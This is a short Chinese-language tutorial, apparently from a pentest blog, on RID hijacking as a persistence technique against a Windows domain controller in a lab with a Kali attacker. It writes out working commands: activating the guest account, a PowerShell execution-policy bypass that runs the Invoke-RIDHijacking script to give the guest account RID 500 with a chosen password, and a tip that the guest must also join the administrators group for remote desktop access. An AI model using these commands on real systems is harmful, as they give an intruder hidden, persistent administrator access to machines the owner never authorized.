使用前提

拿到主机权限后你得先激活guest账户,不然无法使用,net use guest /active:yes

使用工具(powershell脚本)

链接:https://github.com/r4wd3r/RID-Hijacking

环境:

kali(攻击机):172.16.1.9
靶机(域控):172.16.1.12
以获取域控administrator权限
image.png

使用方式:

1.进入目标会话,使用如下命令:powershell -exec bypass -c “& {import-module c:\invoke-ridhijacking.ps1;invoke-ridhijacking -useguest -rid 500 -password aA654321}”
image.png
2.真实机上测试远程连接
image.png
image.png
image.png
注意:这里有个坑,就是你必须将guest账户加入进管理员组才能远程连接,单独加入远程桌面组都不得行